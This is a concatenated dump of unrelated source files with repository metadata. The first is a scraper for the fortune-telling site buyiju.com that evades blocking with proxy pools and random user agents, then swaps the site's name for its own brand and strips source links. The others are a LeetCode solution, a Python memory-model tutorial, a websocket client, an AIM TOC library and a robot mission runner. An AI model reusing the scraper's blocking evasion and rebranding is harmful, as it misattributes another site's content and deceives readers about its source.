base_url2 = 'https://m.buyiju.com/chouqian/{}/'
if lot_type == 'gy':
# 观音灵签, 共100签
referer = base_referer.format('guanyin')
qid = str(get_random_int_number(1, 100))
url = base_url.format('guanyin')
elif lot_type == 'fz':
# 佛祖灵签, 共51签
referer = base_referer2.format('fozu')
qid = str(get_random_int_number(1, 51))
url = base_url2.format('fozu')
elif lot_type == 'yl':
# 月老灵签, 共101签
referer = base_referer.format('yuelao')
qid = str(get_random_int_number(1, 101))
url = base_url.format('yuelao')
elif lot_type == 'gd':
# 关帝灵签, 共100签
referer = base_referer.format('guandi')
qid = str(get_random_int_number(1, 100))
url = base_url.format('guandi')
elif lot_type == 'hdx':
# 黄大仙灵签, 共100签
referer = base_referer.format('hdx')
qid = str(get_random_int_number(1, 100))
url = base_url.format('hdx')
elif lot_type == 'lz':
# 吕祖灵签, 共100签
referer = base_referer.format('lvzu')
qid = str(get_random_int_number(1, 100))
url = base_url.format('lvzu')
elif lot_type == 'mz':
# 天后妈祖灵签, 共101签
referer = base_referer2.format('mazu')
qid = str(get_random_int_number(1, 101))
url = base_url2.format('mazu')
elif lot_type == 'cs':
# 财神灵签, 共61签
referer = base_referer2.format('caishen')
qid = str(get_random_int_number(1, 61))
url = base_url2.format('caishen')
elif lot_type == 'dzw':
# 地藏王灵签, 共60签
referer = base_referer2.format('dizangwang')
qid = str(get_random_int_number(1, 60))
url = base_url2.format('dizangwang')
elif lot_type == 'yj':
# 易经64卦灵签, 共64签
referer = base_referer2.format('yijing')
qid = str(get_random_int_number(1, 64))
url = base_url2.format('yijing')
elif lot_type == 'tslj':
# 太上老君灵签, 共28签
referer = base_referer2.format('taishanglaojun')
qid = str(get_random_int_number(1, 28))
url = base_url2.format('taishanglaojun')
else:
raise NotImplemented('lot_type value异常!')
return referer, qid, url
async def fortune_telling_by_lot(self, lot_type: str) -> dict:
"""
根据抽签类别进行抽签
:param lot_type:
:return:
"""
assert lot_type != '', 'lot_type != ""'
referer, qid, url = await self.get_lot_some_params(lot_type=lot_type)
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': referer,
})
data = {
'qian': 'ok',
'qid': qid,
}
body = await unblock_request(
method='post',
url=url,
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['fortune_telling_by_lot']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_fortune_telling_by_lot_content(content=content)
print(content)
return {
'res': content,
}
async def word_and_fortune_telling(self, two_words: str) -> dict:
"""
测字算命
:param two_words: 2字
:return:
"""
assert two_words != '', 'two_words != ""'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/cezi/',
})
data = {
'czsm': two_words,
'action': 'test',
}
body = await unblock_request(
url='https://m.buyiju.com/cm/cezi/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['word_and_fortune_telling']['content'],
target_obj=body,
logger=self.lg,)
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_word_and_fortune_telling_content(content=content)
print(content)
return {
'res': content,
}
async def name_scoring(self, surname: str, name: str) -> dict:
"""
姓名打分
:param surname: 姓
:param name: 名字
:return:
"""
assert surname != '' and name != '', \
'surname or name 为空值!'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
})
data = {
'xs': surname,
'mz': name,
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/cm/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['name_scoring']['content'],
target_obj=body,
logger=self.lg,)
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_name_scoring_content(content=content)
print(content)
return {
'res': content,
}
@staticmethod
async def _wash_constellation_pairing_content(content) -> str:
"""
清洗星座配对
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>'),
],
add_sensitive_str_list=None,
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_distribution_pairs_of_names_content(content) -> str:
"""
姓名缘分测试
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>'),
],
add_sensitive_str_list=[
'<small>www.buyiju.com/peidui/xmyf.php</small>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_license_plate_num_for_good_or_bad_content(content) -> str:
"""
清洗车牌测吉凶
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>优秀网车牌祥批</strong></p>',
'<p>以上结果为通用数理分析,如需全面掌握车牌号 <span class=\"red\">.*?</span> 带给你的机缘,可请优秀网结合 <strong>生辰八字</strong>进行测算,让你全面掌握车牌号带给你的机缘!可以为选车牌号提供参考。</p>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
if content != '':
# 牌照底纹蓝色
content = '<style>.cp{width:180px;margin:auto;} .cp ul{color:white;font-weight:bold;letter-spacing:2px;background-color:blue;padding:2px;} .cp ul li{border:2px solid #fff;text-transform:uppercase;font:normal normal 26px/30px Arial, Helvetica, sans-serif;list-style-type: none;padding-top:2px;} .zmdx{text-transform:uppercase;}</style>' + \
content
else:
pass
return content
@staticmethod
async def _wash_phone_number_for_good_or_bad_luck_content(content) -> str:
"""
清洗手机号码测吉凶
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>优秀网手机号吉凶祥批</strong></p>',
'<p>以上结果为通用数理分析,如需全面掌握手机号码 <span class=\"red\">\d+</span> 带给您的机缘,可请优秀网结合您的 <strong>生辰八字</strong> 进行测算,可以为选手机号提供参考。</p>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_birthday_fortune_telling_content(content) -> str:
"""
清洗生日算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<a href=\"/sm/cx.php\">点此进行精确的星座查询</a>',
'如果您的生日刚好处于起止点日期前后,您可能需要进行精确的星座查询,。',
],
is_default_filter=False,
is_lower=False,)
return content
@staticmethod
async def _wash_fortune_telling_by_lot_content(content) -> str:
"""
清洗抽签算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>大师解签</strong></p>',
'<p>以上解签为通用解释,如需知晓具体事宜,可请大师结合您的生辰八字解签:</p>',
],
is_default_filter=False,
is_lower=False,)
return content
@staticmethod
async def _wash_word_and_fortune_telling_content(content) -> str:
"""
清洗测字算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>')
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_name_scoring_content(content) -> str:
"""
清洗姓名打分
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>'),
('<table>', '<table border=\"1\" width=\"100%\" bgcolor=\"white\" cellpadding=\"2\">')
],
add_sensitive_str_list=[
# 笔画不准, 过滤掉
'<tr><td>笔划:.*?</td></tr>',
'<p><strong>八字姓名详批</strong></p>',
'<p>优秀网独家研发的姓名学祥批,打破五行笔划测吉凶的限制,为您正确揭示姓名 <span class=\"red\">.*?</span> 的吉凶能量,并针对你的姓名提供专属的开运方法,让你全面掌握姓名的权威解读!起名必看!</p>',
],
is_default_filter=False,
is_lower=False,)
if content != '':
content = '<link href="//i.buyiju.com/css/mobile.css?v0616" rel="stylesheet" media="screen" type="text/css" />' \
+ content
else:
pass
return content
@catch_exceptions_with_class_logger(default_res='aa')
def test(self) -> str:
a = 'test test'
b, c, d = a.split()
return ''
@staticmethod
def get_parser_obj_dict() -> dict:
return {
'byj': {
'name_scoring': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'word_and_fortune_telling': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'fortune_telling_by_lot': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'birthday_fortune_telling': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'phone_number_for_good_or_bad_luck': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'license_plate_num_for_good_or_bad': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'distribution_pairs_of_names': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'constellation_pairing': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
},
}
@staticmethod
async def get_random_phone_headers() -> dict:
return {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': get_random_phone_ua(),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
}
def __del__(self):
try:
del self.loop
except:
pass
collect()
if __name__ == '__main__':
byj_spider = BuYiJuSpider()
loop = get_event_loop()
loop.run_until_complete(byj_spider._fck_run()) | [
"superonesfazai@gmail.com"
] | superonesfazai@gmail.com |
a9d4ac0dc4600aad5c813e4f10bbfc32474689da | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/reach-a-number/src/Solution.py | d0db1844032445cbf8a4d7b18d9dca9e6ff0fe52 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class Solution:
def reachNumber(self, target: int) -> int:
target = abs(target)
res = 0
sum = 0
while sum < target or (sum - target) % 2 == 1:
res += 1
sum += res
return res
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
149ae6b89e08984c8892fd21814a9ce971fb68fc | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec03_function/memory_model.py | e0d53d8b99bd2f5313bda8b0570513bc336febf0 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
파이썬 메모리 모델 - 파이썬이 변수들의 메모리 공간을 관리하는 방법.
"""
n1 = 1
print(f'주소 : {id(n1)}, 저장된 값 : {n1}') # 주소 : 140719357063440, 저장된 값 : 1
n2 = n1
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063440, 저장된 값 = 1
n2 = 2
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063472, 저장된 값 = 2
n3 = 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063440, 저장된 값 = 1
n3 = 3 - 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063472, 저장된 값 = 2
s1 = 'abc'
s2 = 'abc'
print(f'주소 = {id(s1)}, 저장된 값 = {s1}') # 주소 = 2376176854256, 저장된 값 = abc
print(f'주소 = {id(s2)}, 저장된 값 = {s2}') # 주소 = 2376176854256, 저장된 값 = abc
# 저장된 값이 같은 것들은 주소가 서로 같음. => 숫자 / 문자열인 경우, 생성된 객체를 캐싱(재활용)
# 숫자 / 문자열이 아닌 객체는, 값이 같아도 주소가 다름.(캐싱 X. 주소가 새롭게 생성됨)
list1 = [1, 2, 3]
list2 = [1, 2, 3]
print(f'주소 = {id(list1)}, 저장된 값 = {list1}') # 주소 = 2290452484680, 저장된 값 = [1, 2, 3]
print(f'주소 = {id(list2)}, 저장된 값 = {list2}') # 주소 = 2290452485192, 저장된 값 = [1, 2, 3]
list3 = list2
print(f'주소 = {id(list3)}, 저장된 값 = {list3}') # list2를 참조 했기 때문에 list2와 list3의 주소는 같음.
list2[0] = 100
print(list2, list3) # [100, 2, 3] [100, 2, 3]
# list2를 변경했더니, list3까지도 같이 변경되었다. ~~~> list2와 list3의 주소가 서로 같기 때문.
list3[1] = 200
print(list2, list3) # [100, 200, 3] [100, 200, 3]
# 마찬가지로, list3을 변경하면 list2도 같이 변경된다.
# 정리하자면 list1과 list2는 다른 객체(주소가 다름), list2와 list3은 같은 객체.(주소가 같음)
# '==' 연산자 VS 'is' 연산자
a = [1, 2, 3]
b = [1, 2, 3]
print(f'== : {a == b}, is : {a is b}') # == : True, is : False
# '==' ~~~~~> 서로 '값'이 같은가? / 'is' ~~~~~> 서로 '주소'가 같은가?
| [
"mrdh94@naver.com"
] | mrdh94@naver.com |
dd9bf12890563e9f4e394367ee17592436c4db4e | c2210b7012d2cd608ba1c350169107fe79584568 | /helmet_seatbelt/src/python3/websocket-test0.py | 05cf8c319d37e16fb10b6e2696f67f4e190b8d93 | [] | no_license | ISCAS007/demo | 9165eb2765f35a93abf790977358b55a39cb5d7d | 92addff2e4a09f58ac405b9ce155f79604ac8169 | refs/heads/master | 2023-05-09T18:14:38.153027 | 2019-12-03T03:22:38 | 2019-12-03T03:22:38 | 375,907,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | #!/usr/bin/env python3
import asyncio
import websockets
import sys
@asyncio.coroutine
def hello():
websocket = yield from websockets.connect('ws://t.qdrise.com.cn:1234/')
try:
name=sys.argv[1]
yield from websocket.send(name)
print("> {}".format(name))
greeting = yield from websocket.recv()
print("< {}".format(greeting))
finally:
yield from websocket.close()
asyncio.get_event_loop().run_until_complete(hello())
| [
"youdaoyzbx@163.com"
] | youdaoyzbx@163.com |
2450876daff5dc84c0f6342726ad96dfe41cf71b | b1bc2e54f8cd35c9abb6fc4adb35b386c12fe6b4 | /toontown/src/testenv/toc.py | 1f7ec6b068f1921a13817e828cb530ce4eb4d2ec | [] | no_license | satire6/Anesidora | da3a44e2a49b85252b87b612b435fb4970469583 | 0e7bfc1fe29fd595df0b982e40f94c30befb1ec7 | refs/heads/master | 2022-12-16T20:05:13.167119 | 2020-09-11T16:58:04 | 2020-09-11T17:02:06 | 294,751,966 | 89 | 32 | null | null | null | null | UTF-8 | Python | false | false | 15,417 | py | ############################################
# Py-TOC 2.4
#
# Jamie Turner <jamwt@jamwt.com>
#
_VERSION = "2.4"
import socket
# import select
import re
import struct
import random
import sys
import time
import thread
import threading
TOC_SERV_AUTH = ("login.oscar.aol.com", 5159 )
TOC_SERV = ( "toc.oscar.aol.com", 9898 )
class TOCError(Exception):
pass
class TOCDisconnectError(Exception):
pass
class TocTalk:
def __init__(self,nick,passwd):
self._nick = nick
self._passwd = passwd
self._agent = "PY-TOC"
self._info = "I'm running the Python TOC Module by Jamie Turner <jamwt@jamwt.com>"
self._seq = random.randint(0,65535)
self._logfd = sys.stdout
self._debug = 1
self._running = 0
self._ignore = 0
self._tsem = threading.Semaphore()
self.build_funcs()
def build_funcs(self):
self._dir = []
for item in dir(self.__class__):
if ( type( eval("self.%s" % item)) == type(self.__init__) and
item[:3] == "on_" ):
self._dir.append(item)
def go(self):
self.connect()
self._running = 1
self.process_loop()
def start(self):
pass
def connect(self):
#create the socket object
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except:
raise TOCError, "FATAL: Couldn't create a socket"
# make the connection
try:
self._socket.connect( TOC_SERV )
except:
raise TOCDisconnectError, "FATAL: Could not connect to TOC Server"
buf = "FLAPON\r\n\r\n"
bsent = self._socket.send(buf)
if bsent <> len(buf):
raise TOCError, "FATAL: Couldn't send FLAPON!"
def start_log_in(self):
ep = self.pwdenc()
self._normnick = self.normalize(self._nick)
msg = struct.pack("!HHHH",0,1,1,len(self._normnick)) + self._normnick
self.flap_to_toc(1,msg)
#now, login
self.flap_to_toc(2,"toc_signon %s %s %s %s english %s" % (
TOC_SERV_AUTH[0],TOC_SERV_AUTH[1],self._normnick,ep,self.encode(self._agent) ) )
def normalize(self,data):
return re.sub("[^A-Za-z0-9]","",data).lower()
def encode(self,data):
for letter in "\\(){}[]$\"":
data = data.replace(letter,"\\%s"%letter)
return '"' + data + '"'
def flap_to_toc(self,ftype,msg):
if ftype == 2:
msg = msg + struct.pack("!B", 0)
ditems = []
ditems.append("*")
ditems.append(struct.pack("!BHH",ftype,self._seq,len(msg)))
ditems.append(msg)
data = "".join(ditems)
if len(data) >= 2048:
raise TOCError, "TOC data with protocol overhead cannot exceed 2048 bytes."
self.derror( "SEND : \'%r\'" % data )
# in case we're threading
self._tsem.acquire()
bsent = self._socket.send(data)
self._tsem.release()
if bsent <> len(data):
#maybe make less severe later
# I've never seen this happen.. have you??
raise TOCError, "FATAL: Couldn't send all data to TOC Server\n"
self._seq = self._seq + 1
def pwdenc(self):
lookup = "Tic/Toc"
ept = []
x = 0
for letter in self._passwd:
ept.append("%02x" % ( ord(letter) ^ ord( lookup[x % 7]) ) )
x = x + 1
return "0x" + "".join(ept)
def process_loop(self):
# the "main" loop
while 1:
event = self.recv_event()
if not event:
continue
self.handle_event(event)
def handle_event(self,event):
self.derror( "RECV : %r" % event[1] )
#else, fig out what to do with it
#special case-- login
if event[0] == 1:
self.start_log_in()
return
if not event[1].count(":"):
data = ""
id = "NOID"
else:
ind = event[1].find(":")
id = event[1][:ind].upper()
data = event[1][ind+1:]
#handle manually now
if id == "SIGN_ON":
self.c_SIGN_ON(id,data)
return
if id == "ERROR":
self.c_ERROR(id,data)
return
#their imp
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
self.werror("INFO : Received unimplemented '%s' id" % id)
def recv_event(self):
# TODO: this is a non-blocking hack.
# what if the first 6 bytes are there but nothing else?
try:
header = self._socket.recv(6)
except:
return
if header == "":
self.err_disconnect()
return
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
return
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
return (mtype, data)
def thread_recv_events(self):
while self._running:
rfd,dc,dc = select.select([self._socket],[],[])
if rfd == []:
continue
try:
header = self._socket.recv(6)
except:
self.err_disconnect()
if header == "":
self.err_disconnect()
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
if not self._ignore:
self.handle_event([mtype,data])
def err_disconnect(self):
self.werror( "INFO: Disconnected!\n" )
raise TOCDisconnectError, "FATAL: We seem to have been disconnected from the TOC server.\n"
# our event handling
def c_ERROR(self,id,data):
# let's just grab the errors we care about!
#still more fields
if data.count(":"):
dt = int (data[:data.find(":")])
else:
dt = int(data) # let's get an int outta it
if dt == 980:
raise TOCError, "FATAL: Couldn't sign on; Incorrect nickname/password combination"
elif dt == 981:
raise TOCError, "FATAL: Couldn't sign on; The AIM service is temporarily unavailable"
elif dt == 982:
raise TOCError, "FATAL: Couldn't sign on; Your warning level is too high"
elif dt == 983:
raise TOCError, "FATAL: Couldn't sign on; You have been connecting and disconnecting too frequently"
elif dt == 989:
raise TOCError, "FATAL: Couldn't sign on; An unknown error occurred"
# ... etc etc etc
else:
# try to let further implementation handle it
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
self.werror("ERROR: The TOC server sent an unhandled error string: %s" % data)
def c_SIGN_ON(self,type,data):
self.flap_to_toc(2,"toc_add_buddy %s" % self.normalize(self._nick)) # needs to start up corectly
self.flap_to_toc(2,"toc_set_info %s" % self.encode(self._info) )
self.flap_to_toc(2,"toc_init_done")
self.start()
def strip_html(self,data):
return re.sub("<[^>]*>","",data)
def normbuds(self,buddies):
nbuds = []
for buddy in buddies:
nbuds.append(self.normalize(buddy))
return " ".join(nbuds)
#actions--help the user w/common tasks
#the all-important
def do_SEND_IM(self,user,message,autoaway=0):
sendmessage = "toc_send_im %s %s" % ( self.normalize(user), self.encode(message) )
if autoaway:
sendmessage = sendmessage + " auto"
self.flap_to_toc(2, sendmessage)
def do_ADD_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_add_buddy %s" % self.normbuds(buddies) )
def do_ADD_PERMIT(self,buddies):
self.flap_to_toc(2,"toc_add_permit %s" % self.normbuds(buddies) )
def do_ADD_DENY(self,buddies):
self.flap_to_toc(2,"toc_add_deny %s" % self.normbuds(buddies) )
def do_REMOVE_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_remove_buddy %s" % self.normbuds(buddies) )
# away, idle, user info handling
def do_SET_IDLE(self,itime):
self.flap_to_toc(2,"toc_set_idle %d" % itime )
def do_SET_AWAY(self,awaymess):
if awaymess == "":
self.flap_to_toc(2,"toc_set_away")
return
self.flap_to_toc(2,"toc_set_away %s" % self.encode(awaymess) )
def do_GET_INFO(self,user):
self.flap_to_toc(2,"toc_get_info %s" % self.normalize(user) )
def do_SET_INFO(self,info):
self.flap_to_toc(2,"toc_set_info %s" % self.encode(info) )
# warning capability
def do_EVIL(self,user,anon=0):
if anon:
acode = "anon"
else:
acode = "norm"
self.flap_to_toc(2,"toc_evil %s %s" % (self.normalize(user), acode) )
#chat
def do_CHAT_INVITE(self,room,imess,buddies):
self.flap_to_toc(2,"toc_chat_invite %s %s %s" % (self.normalize(room),
self.encode(imess), self.normbuds(buddies) ) )
def do_CHAT_ACCEPT(self, id):
self.flap_to_toc(2,"toc_chat_accept %s" % id)
def do_CHAT_LEAVE(self,id):
self.flap_to_toc(2,"toc_chat_leave %s" % id)
def do_CHAT_WHISPER(self,room,user,message):
self.flap_to_toc(2,"toc_chat_whisper %s %s %s" % (room,
self.normalize(user), self.encode(message) ) )
def do_CHAT_SEND(self,room,message):
self.flap_to_toc(2,"toc_chat_send %s %s" % (room,
self.encode(message) ) )
def do_CHAT_JOIN(self,roomname):
self.flap_to_toc(2,"toc_chat_join 4 %s" % roomname)
def do_SET_CONFIG(self,configstr):
self.flap_to_toc(2,"toc_set_config \"%s\"" % configstr)
# error funcs
def werror(self,errorstr):
if self._debug:
self._logfd.write("(%s) %s\n"% (self._nick,errorstr))
def derror(self,errorstr):
if self._debug > 1:
self._logfd.write("(%s) %s\n"% (self._nick,errorstr))
class BotManagerError(Exception):
pass
class BotManager:
def __init__(self):
self.bots = {}
def addBot(self,bot,botref,go=1,reconnect=1,delay=30):
if self.bots.has_key(botref):
raise BotManagerError, "That botref is already registered"
self.bots[botref] = bot
self.bots[botref]._reconnect = reconnect
self.bots[botref]._delay = delay
if go:
self.botGo(botref)
def botGo(self,botref):
if not self.bots.has_key(botref):
raise BotManagerError, "That botref has not been registered"
thread.start_new_thread(self._dispatcher,(self.bots[botref],))
def botStop(self,botref):
if not self.bots.has_key(botref):
raise BotManagerError, "That botref has not been registered"
self.bots[botref]._running = 0
self.bots[botref]._socket.close()
def botPause(self,botref,val=1):
if not self.bots.has_key(botref):
raise BotManagerError, "That botref has not been registered"
self.bots[botref]._ignore = val
def getBot(self,botref):
if not self.bots.has_key(botref):
raise BotManagerError, "That botref has not been registered"
return self.bots[botref]
def _dispatcher(self,bot):
while 1:
try:
bot.connect()
bot._running = 1
bot.thread_recv_events()
except TOCDisconnectError:
if not bot._reconnect or not bot._running:
break
bot._running = 0
time.sleep(bot._delay) # then we reconnect
else:
break
thread.exit()
def wait(self):
while 1:
time.sleep(2000000) # not coming back from this...
| [
"66761962+satire6@users.noreply.github.com"
] | 66761962+satire6@users.noreply.github.com |
c3d423561ba81e648124b4013b007394c0427eff | e665fe109ce9823d965e303ca8677b5a065ad9df | /mission/runner.py | d1907d30f805a18b3e0801c7c0ac9525481d2f53 | [
"BSD-3-Clause"
] | permissive | deciament/software | 822a704dfaab84f5260a284271cdec1b3664b94f | 06ad1d9ea239d116252510beed248bc6031cd622 | refs/heads/master | 2021-01-14T12:40:04.946245 | 2015-12-31T02:28:33 | 2015-12-31T02:28:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,653 | py | #!/usr/bin/env python3.4
import time, argparse, traceback, sys, datetime, os, shm
# Note: this is a hack; will only function if your PYTHONPATH is solely the standard software one (~/cuauv/software; i.e. the root directory of the repo)
pythonpath = os.environ.get('PYTHONPATH')
sys.path.append(pythonpath + '/mission')
from auv_python_helpers.colors import *
from mission.framework.auxiliary import zero_outputs
from mission.framework.task import Task
from auvlog.client import log as auvlog
def foldl(f, acc, l):
for i in l:
acc = f(acc, i)
return acc
def exit(status):
shm.mission_start_switch.mission_start.set(0)
sys.exit(status)
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--nticks',
help='Run N mission ticks instead of running continuously.',
default=None,
type=int)
parser.add_argument(
'-t',
'--task',
help='Task name to load; default "Main".',
default='Main',
type=str)
parser.add_argument(
'-f',
'--file',
help='File from which to load the task; default "teagle.py".',
default='teagle.py',
type=str)
parser.add_argument(
'-r',
'--rate',
help='Number of mission ticks to run per second; default 50',
default=50,
type=int)
parser.add_argument(
'-q',
'--quiet',
help="Don't ouput diagnostic messages.",
default=False,
type=bool)
args = parser.parse_args()
def fmt(n_ticks, msg):
return '[{0}] ({1}) Tick: {2} Message: {3}'.format(red(datetime.datetime.now().isoformat()), yellow('MISSION'), green(str(n_ticks)), msg)
def log(n_ticks, msg):
if not args.quiet:
print(fmt(n_ticks, msg))
def error(n_ticks, msg):
sys.stderr.write(fmt(n_ticks, msg) + "\n")
sys.stderr.flush()
def logR(n_ticks, msg):
if not args.quiet:
print(fmt(n_ticks, msg) + '\r', end = '')
if __name__ == '__main__':
try:
module_name = args.file[:-3] if args.file[-3:] == '.py' else args.file
split = module_name.split('.')
# Python imports are ludicrous.
module = __import__(module_name)
print("HELLLLO")
module = foldl(lambda x, y: getattr(x, y), __import__(split[0]), split[1:])
except ImportError as e:
error(0, 'Error importing module "{0}". Perhaps this file does not exist or is not in your PYTHONPATH.'.format(args.file))
error(0, 'Traceback: \n\n{0}'.format(traceback.format_exc()))
exit(1)
try:
task = getattr(module, args.task)
except AttributeError:
error(0, 'Error loading task "{0}". Perhaps this task does not exist within the specified file or was misspelled.'.format(args.task))
exit(1)
n_ticks = 0
last = time.time()
try:
log(0, 'Starting mission.')
shm.mission_start_switch.mission_start.set(1)
while args.nticks is None or n_ticks < args.nticks:
start = time.time()
delta = start - last
try:
task()
except Exception as e:
print(e)
time.sleep(max((1 / args.rate) - delta, 0))
if hasattr(task, 'finished') and task.finished:
error(n_ticks, 'Mission complete.')
zero_outputs()
exit(0)
else:
logR(n_ticks, 'Ticked.')
n_ticks += 1
last = start
if args.nticks == n_ticks:
log(n_ticks, 'Mission complete.')
zero_outputs()
exit(0)
error(n_ticks, "Should not be here!")
except Exception as e:
error(n_ticks, 'Exception encountered. Traceback: \n\n{0}'.format(traceback.format_exc()))
error(n_ticks, 'Mission terminated; zeroing outputs.')
zero_outputs()
# exit(1)
except KeyboardInterrupt:
zero_outputs()
exit(0)
| [
"software@cuauv.org"
] | software@cuauv.org |
c1fd20c4eea3537d21b0008d159d2b0bd475ec74 | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res_bw/scripts/common/lib/trace.py | d37d013782ea519e0ad3801b919f72486f9fd5b1 | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 24,614 | py | # 2016.05.01 15:28:28 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/trace.py
"""program/module to trace Python program or function execution
Sample use, command line:
trace.py -c -f counts --ignore-dir '$prefix' spam.py eggs
trace.py -t --ignore-dir '$prefix' spam.py eggs
trace.py --trackcalls spam.py eggs
Sample use, programmatically
import sys
